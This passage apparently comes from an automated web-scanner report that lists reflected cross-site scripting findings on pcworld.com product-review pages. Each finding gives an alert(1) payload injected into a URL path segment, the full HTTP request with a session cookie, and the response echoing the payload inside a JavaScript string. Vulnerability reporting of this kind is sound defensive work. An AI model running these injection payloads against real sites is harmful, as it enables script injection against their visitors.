HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:10:50 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
erEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/product/418937/review/lenovo_thinkpad_w701ds.html8d77f'-alert(1)-'b730f841bb2';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.143. http://www.pcworld.com/reviews/product/464683/review/lexmark_pinnacle_pro901.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/product/464683/review/lexmark_pinnacle_pro901.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aca7f'-alert(1)-'14a2e660044 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/product/464683/reviewaca7f'-alert(1)-'14a2e660044/lexmark_pinnacle_pro901.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 23:09:29 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=B690AC0CEEC37651C47B8FBA56B0011E; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:09:29 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
erEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/product/464683/reviewaca7f'-alert(1)-'14a2e660044/lexmark_pinnacle_pro901.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       docu
...[SNIP]...

1.144. http://www.pcworld.com/reviews/product/464683/review/lexmark_pinnacle_pro901.html [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/product/464683/review/lexmark_pinnacle_pro901.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9b550'-alert(1)-'790bcdc0925 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/product/464683/review/lexmark_pinnacle_pro901.html9b550'-alert(1)-'790bcdc0925 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F201A23DAA937638E0686725A2D8FB06; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:09:33 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
rEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/product/464683/review/lexmark_pinnacle_pro901.html9b550'-alert(1)-'790bcdc0925';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.145. http://www.pcworld.com/reviews/product/470930/review/samsung_ln46c650_46inch_lcd_tv.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/product/470930/review/samsung_ln46c650_46inch_lcd_tv.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb12f'-alert(1)-'adec32fd08 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/product/470930/revieweb12f'-alert(1)-'adec32fd08/samsung_ln46c650_46inch_lcd_tv.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 23:09:40 GMT
Cache-Control: max-age=60
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:09:40 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
erEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/product/470930/revieweb12f'-alert(1)-'adec32fd08/samsung_ln46c650_46inch_lcd_tv.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
...[SNIP]...

1.146. http://www.pcworld.com/reviews/product/470930/review/samsung_ln46c650_46inch_lcd_tv.html [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/product/470930/review/samsung_ln46c650_46inch_lcd_tv.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 10866'-alert(1)-'39e7f7710c1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/product/470930/review/samsung_ln46c650_46inch_lcd_tv.html10866'-alert(1)-'39e7f7710c1 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:09:41 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
);
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/product/470930/review/samsung_ln46c650_46inch_lcd_tv.html10866'-alert(1)-'39e7f7710c1';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.147. http://www.pcworld.com/reviews/product/470949/review/lg_electronics_infinia_47le8500_47inch_lcd_tv.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/product/470949/review/lg_electronics_infinia_47le8500_47inch_lcd_tv.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 381c1'-alert(1)-'9d27cb5fcbb was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/product/470949/review381c1'-alert(1)-'9d27cb5fcbb/lg_electronics_infinia_47le8500_47inch_lcd_tv.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 23:10:51 GMT
Cache-Control: max-age=60
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:10:50 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
erEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/product/470949/review381c1'-alert(1)-'9d27cb5fcbb/lg_electronics_infinia_47le8500_47inch_lcd_tv.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += Reme
...[SNIP]...

1.148. http://www.pcworld.com/reviews/product/470949/review/lg_electronics_infinia_47le8500_47inch_lcd_tv.html [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/product/470949/review/lg_electronics_infinia_47le8500_47inch_lcd_tv.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cf76b'-alert(1)-'828e8a511f6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/product/470949/review/lg_electronics_infinia_47le8500_47inch_lcd_tv.htmlcf76b'-alert(1)-'828e8a511f6 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:10:52 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
lid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/product/470949/review/lg_electronics_infinia_47le8500_47inch_lcd_tv.htmlcf76b'-alert(1)-'828e8a511f6';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.149. http://www.pcworld.com/reviews/product/471085/review/panasonic_viera_tcp46g25_46inch_plasma_tv.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/product/471085/review/panasonic_viera_tcp46g25_46inch_plasma_tv.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 29dee'-alert(1)-'8448a0e63d5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/product/471085/review29dee'-alert(1)-'8448a0e63d5/panasonic_viera_tcp46g25_46inch_plasma_tv.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 23:10:11 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=23DE139CE624FED7AAE2062059D17AA2; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:10:10 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
erEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/product/471085/review29dee'-alert(1)-'8448a0e63d5/panasonic_viera_tcp46g25_46inch_plasma_tv.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += Remember
...[SNIP]...

1.150. http://www.pcworld.com/reviews/product/471085/review/panasonic_viera_tcp46g25_46inch_plasma_tv.html [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/product/471085/review/panasonic_viera_tcp46g25_46inch_plasma_tv.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 11b85'-alert(1)-'aebe8372ee5 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/product/471085/review/panasonic_viera_tcp46g25_46inch_plasma_tv.html11b85'-alert(1)-'aebe8372ee5 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=8F2089B7F39FCE9DAFF75A3CDDCF592D; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:10:13 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/product/471085/review/panasonic_viera_tcp46g25_46inch_plasma_tv.html11b85'-alert(1)-'aebe8372ee5';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.151. http://www.pcworld.com/reviews/product/484251/review/avadirect_clevo_x8100_core_i7_gaming_notebook.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/product/484251/review/avadirect_clevo_x8100_core_i7_gaming_notebook.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 708ca'-alert(1)-'558b730d3aa was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/product/484251/review708ca'-alert(1)-'558b730d3aa/avadirect_clevo_x8100_core_i7_gaming_notebook.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 23:12:29 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=2E0E97665D49215955AADEF88ED10219; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:12:28 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
erEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/product/484251/review708ca'-alert(1)-'558b730d3aa/avadirect_clevo_x8100_core_i7_gaming_notebook.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += Reme
...[SNIP]...

1.152. http://www.pcworld.com/reviews/product/484251/review/avadirect_clevo_x8100_core_i7_gaming_notebook.html [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/product/484251/review/avadirect_clevo_x8100_core_i7_gaming_notebook.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72e09'-alert(1)-'d25ec35c0e1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/product/484251/review/avadirect_clevo_x8100_core_i7_gaming_notebook.html72e09'-alert(1)-'d25ec35c0e1 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=11E646581C7F9AF5CD237C4AFA48E212; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:12:34 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
lid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/product/484251/review/avadirect_clevo_x8100_core_i7_gaming_notebook.html72e09'-alert(1)-'d25ec35c0e1';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.153. http://www.pcworld.com/reviews/product/602425/review/sony_bravia_xbr46hx909_46inch_lcd_tv.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/product/602425/review/sony_bravia_xbr46hx909_46inch_lcd_tv.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a1786'-alert(1)-'46702a8e1d2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/product/602425/reviewa1786'-alert(1)-'46702a8e1d2/sony_bravia_xbr46hx909_46inch_lcd_tv.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 23:09:52 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=1940E49287A177303E3055EF089685AC; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:09:52 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
erEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/product/602425/reviewa1786'-alert(1)-'46702a8e1d2/sony_bravia_xbr46hx909_46inch_lcd_tv.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.q
...[SNIP]...

1.154. http://www.pcworld.com/reviews/product/602425/review/sony_bravia_xbr46hx909_46inch_lcd_tv.html [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/product/602425/review/sony_bravia_xbr46hx909_46inch_lcd_tv.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d587c'-alert(1)-'ac193886ae4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/product/602425/review/sony_bravia_xbr46hx909_46inch_lcd_tv.htmld587c'-alert(1)-'ac193886ae4 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=5E8715370016D9614E811E2BAF466F58; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:09:53 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
ogon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/product/602425/review/sony_bravia_xbr46hx909_46inch_lcd_tv.htmld587c'-alert(1)-'ac193886ae4';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.155. http://www.pcworld.com/reviews/product/604358/review/hp_envy_17.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/product/604358/review/hp_envy_17.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7556a'-alert(1)-'bf2b95a8197 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/product/604358/review7556a'-alert(1)-'bf2b95a8197/hp_envy_17.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 23:11:18 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=D851AA759797BD022E702BCB64C79890; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:11:17 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
erEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/product/604358/review7556a'-alert(1)-'bf2b95a8197/hp_envy_17.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie =
...[SNIP]...

1.156. http://www.pcworld.com/reviews/product/604358/review/hp_envy_17.html [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/product/604358/review/hp_envy_17.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 41ec4'-alert(1)-'89e3b25fc6f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/product/604358/review/hp_envy_17.html41ec4'-alert(1)-'89e3b25fc6f HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F7F240F46DF6CA1E13AAD166EDC6BC7F; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:11:29 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
adCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/product/604358/review/hp_envy_17.html41ec4'-alert(1)-'89e3b25fc6f';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.157. http://www.pcworld.com/reviews/product/644407/review/canon_pixma_mg8120.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/product/644407/review/canon_pixma_mg8120.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1089'-alert(1)-'a2222e313ba was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/product/644407/reviewd1089'-alert(1)-'a2222e313ba/canon_pixma_mg8120.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 23:07:11 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=8C81414423CE8E6E52042F2F9A1B7C97; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:07:11 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
erEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/product/644407/reviewd1089'-alert(1)-'a2222e313ba/canon_pixma_mg8120.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.
...[SNIP]...

1.158. http://www.pcworld.com/reviews/product/644407/review/canon_pixma_mg8120.html [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
